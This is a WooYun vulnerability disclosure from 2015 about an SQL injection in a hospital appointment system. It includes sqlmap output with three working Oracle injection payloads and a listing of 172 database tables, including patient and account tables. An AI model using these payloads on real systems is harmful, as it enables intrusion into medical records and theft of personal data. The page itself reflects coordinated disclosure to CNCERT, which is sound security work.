当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0127930

漏洞标题:某预约挂号系统存在SQL注入影响众多三甲医院

相关厂商:cncert国家互联网应急中心

漏洞作者: 深度安全实验室

提交时间:2015-07-23 16:05

修复时间:2015-10-22 17:06

公开时间:2015-10-22 17:06

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:12

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-07-23: 细节已通知厂商并且等待厂商处理中
2015-07-24: cncert国家互联网应急中心暂未能联系到相关单位,细节仅向通报机构公开
2015-07-27: 细节向第三方安全合作伙伴开放
2015-09-17: 细节向核心白帽子及相关领域专家公开
2015-09-27: 细节向普通白帽子公开
2015-10-07: 细节向实习白帽子公开
2015-10-22: 细节向公众公开

简要描述:

去抢预约发现的~

详细说明:

陕西惠宾电子科技有限公司开发的预约挂号系统,影响一大批三甲医院~
西安交通大学第一附属医院 http://**.**.**.**/searchlist.aspx?class=3&key=1
武警陕西省总队医院 http://**.**.**.**/searchlist.aspx?class=3&key=1
西安交通大学第二附属医院 http://**.**.**.**/searchlist.aspx?class=3&key=1
西安交通大学口腔医院 http://**.**.**.**/searchlist.aspx?class=3&key=1
第四军医大学口腔医学院 http://**.**.**.**/IndexAskq.aspx/searchlist.aspx?class=3&key=1

漏洞证明:

拿交大一附院举例:

1.png

sqlmap identified the following injection points with a total of 57 HTTP(s) requests:
---
Place: GET
Parameter: key
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: class=3&key=1%' AND 9642=9642 AND '%'='
Type: error-based
Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
Payload: class=3&key=1%' AND 2535=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(119)||CHR(118)||CHR(101)||CHR(113)||(SELECT (CASE WHEN (2535=2535) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(100)||CHR(113)||CHR(100)||CHR(113)||CHR(62))) FROM DUAL) AND '%'='
Type: AND/OR time-based blind
Title: Oracle AND time-based blind
Payload: class=3&key=1%' AND 6727=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65)||CHR(98)||CHR(119)||CHR(116),5) AND '%'='
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Oracle
available databases [16]:
[*] CTXSYS
[*] DBSNMP
[*] DMSYS
[*] EXFSYS
[*] HBJDYF
[*] MDSYS
[*] OLAPSYS
[*] ORDSYS
[*] OUTLN
[*] SCOTT
[*] SYS
[*] SYSMAN
[*] SYSTEM
[*] TSMSYS
[*] WMSYS
[*] XDB

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: key
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: class=3&key=1%' AND 9642=9642 AND '%'='
Type: error-based
Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
Payload: class=3&key=1%' AND 2535=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(119)||CHR(118)||CHR(101)||CHR(113)||(SELECT (CASE WHEN (2535=2535) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(100)||CHR(113)||CHR(100)||CHR(113)||CHR(62))) FROM DUAL) AND '%'='
Type: AND/OR time-based blind
Title: Oracle AND time-based blind
Payload: class=3&key=1%' AND 6727=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65)||CHR(98)||CHR(119)||CHR(116),5) AND '%'='
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Oracle
current user: 'HBJDYF'
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: key
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: class=3&key=1%' AND 9642=9642 AND '%'='
Type: error-based
Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
Payload: class=3&key=1%' AND 2535=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(119)||CHR(118)||CHR(101)||CHR(113)||(SELECT (CASE WHEN (2535=2535) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(100)||CHR(113)||CHR(100)||CHR(113)||CHR(62))) FROM DUAL) AND '%'='
Type: AND/OR time-based blind
Title: Oracle AND time-based blind
Payload: class=3&key=1%' AND 6727=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65)||CHR(98)||CHR(119)||CHR(116),5) AND '%'='
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Oracle
Database: HBJDYF
[172 tables]
+-------------------------------+
| ACCOUNT |
| ACCOUNT_FORGETPASSWORD |
| ACCOUNT_INTEGRAL |
| ACCOUNT_PWDANSWER |
| ACCOUNT_PWDQUESTION |
| ACCOUNT_STAT |
| AGC_DEPARTMENT |
| AGC_DEPARTMENTCONFIG |
| AGC_DEPARTMENTNAVIGATION |
| AGC_DEPARTMENTVSDISEASE |
| AGC_DEPARTMENTVSWARD |
| AGC_HOSPITAL |
| AGC_HOSPITALCARD |
| AGC_HOSPITALEMPSTAT |
| AGC_HOSPITALMAPS |
| AGC_HOSPITALVSCARDTYPE |
| AGC_VACATION |
| AGC_WARD |
| API_SERVERCONFIG |
| AUTH_AGCGROUP |
| AUTH_AUTHORITYDIR |
| AUTH_CONFIGURATION |
| AUTH_GROUPS |
| AUTH_MODULEAUTHORITYLIST |
| AUTH_MODULES |
| AUTH_MODULETYPE |
| AUTH_ROLEAUTHORITYLIST |
| AUTH_ROLES |
| AUTH_USERGROUPS |
| AUTH_USERMODULEAUTHORITYLIST |
| AUTH_USERROLES |
| AUTH_USERSINGROUP |
| BLOG_CONFIG |
| BLOG_POST |
| BLOG_TOPIC |
| CHAT_CATEGORY |
| CHAT_CATEGORYGROUP |
| CHAT_MESSAGE |
| CHAT_STAT |
| CLINIC_APPOINTMENT |
| CLINIC_APPOINTMENTHISTORYLOG |
| CLINIC_APPOINTMENTLOG |
| CLINIC_APPOINTMENTNOCARDLIMIT |
| CLINIC_BANKREGIST |
| CLINIC_BLACKLIST |
| CLINIC_BLACKLISTLOG |
| CLINIC_FROMTYPE |
| CLINIC_LABEL |
| CLINIC_LABELCONFIG |
| CLINIC_LABELSTAT |
| CLINIC_LABELSTATLOG |
| CLINIC_LABELTYPE |
| CLINIC_LIMITNUMAGC |
| CLINIC_LIMITSPECIALITYAGC |
| CLINIC_LIMITSPECIALITYLABEL |
| CLINIC_PATIENTSTAT |
| CLINIC_REASON |
| CLINIC_RECORD |
| CLINIC_RECORDHISTORYLOG |
| CLINIC_RECORDLOG |
| CLINIC_REGIST |
| CLINIC_REGISTLOG |
| CLINIC_REGISTRATIONPRICE |
| CLINIC_REGIST_DELETE |
| CLINIC_REGIST_RESERVATION |
| CLINIC_SCHEDULE |
| CLINIC_STOPRECORD |
| CMS_AD |
| CMS_ADPLACE |
| CMS_ADTYPE |
| CMS_CATEGORY |
| CMS_CATEGORYGROUP |
| CMS_CONTENT |
| CMS_CONTENTCOMMENT |
| CMS_CONTENTSTAT |
| CMS_CONTENTVSAGC |
| CMS_CONTENTVSCATEGORY |
| CMS_FRIENDLINK |
| CMS_SHOP |
| CMS_SLIDE |
| CODESMITH_EXTENDED_PROPERTIES |
| CONFIG_BASICINFO |
| CONFIG_EXTRAINFO |
| COOPERATION_UNICOMQR |
| DATA_ACCCOUNTTYPE |
| DATA_AREA |
| DATA_CARDTYPE |
| DATA_CHANNELTYPE |
| DATA_CLINICAPPOINTMENTSTATUS |
| DATA_CMSCATEGORYTYPE |
| DATA_CONTACTTYPE |
| DATA_DEGREE |
| DATA_DEPARTMENTPROPERTY |
| DATA_DEPARTMENTTYPE |
| DATA_DISEASE |
| DATA_DISEASETYPE |
| DATA_DUTY |
| DATA_EDUCATION |
| DATA_HOSPITALLEVEL |
| DATA_HOSPITALTYPE |
| DATA_MARRIAGE |
| DATA_NATION |
| DATA_OPERATETYPE |
| DATA_PAPERSTYPE |
| DATA_POLITICAL |
| DATA_PROFESSION |
| DATA_RETURNVISIT |
| DATA_SEX |
| DATA_SKINS |
| DATA_TITLE |
| EMP_BASICINFO |
| EMP_DOCTORVSDISEASE |
| EMP_EXTRAINFO |
| FORUM_CATEGORY |
| FORUM_CATEGORYGROUP |
| FORUM_POST |
| FORUM_TOPIC |
| HB114_HBPARTVSHOSPITAL |
| LOG_OPERAATIONTYPE |
| LOG_OPERATE_01 |
| LOG_OPERATE_02 |
| LOG_OPERATE_03 |
| LOG_OPERATE_04 |
| LOG_OPERATE_05 |
| LOG_OPERATE_06 |
| LOG_OPERATE_07 |
| LOG_OPERATE_08 |
| LOG_OPERATE_09 |
| LOG_OPERATE_10 |
| LOG_OPERATE_11 |
| LOG_OPERATE_12 |
| LOG_OPERATION |
| LOG_OPERATIONHISTORY |
| MEM_BASICINFO_OLD_TEMP |
| MEM_BILLITEMS |
| MEM_CARD |
| MEM_CONTACT |
| MEM_EXTRAINFO |
| MEM_PATIENT |
| MEM_PATIENTTYPE |
| MEM_PATIENTVSTYPE |
| PASSPORT |
| PASSPORT_ACTIVE |
| PASSPORT_EXTRAINFO |
| PASSPORT_VSACCOUNT |
| PHOTO_CATEGORY |
| PHOTO_CATEGORYTYPE |
| PHOTO_PICTURE |
| QUEST_ANSWER |
| QUEST_OVSQ |
| QUEST_QUESTION |
| QUEST_QUESTIONAIRE |
| QUEST_QUESTIONTYPE |
| QUEST_QVSQUESTION |
| QUEST_RECORD |
| SERVER_FLATORDER |
| SERVER_SMSBLACKLIST |
| SERVER_SMSBLACKLISTLOG |
| SERVER_SMSBLACKREASON |
| SERVER_SMSRECEIVE |
| SERVER_SMSRECEIVELOG |
| SERVER_SMSSEND |
| SERVER_SMSSENDLOG |
| SMS_CONFIG |
| SMS_LIST |
| SMS_LISTLOG |
| SMS_SYS |
| SMS_TYPE |
| SPELL_CODES |
| SYNC_DATA |
| SYNC_DATAHB114 |
| WEIXIN_VSACCOUNT |
+-------------------------------+

上百万账户信息:

2.png

修复方案:

版权声明:转载请注明来源 深度安全实验室@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:12

确认时间:2015-07-24 17:05

厂商回复:

CNVD确认并复现所述漏洞情况,已经转由CNCERT下发给陕西分中心,由陕西分中心后续协调网站管理单位处置。

最新状态:

暂无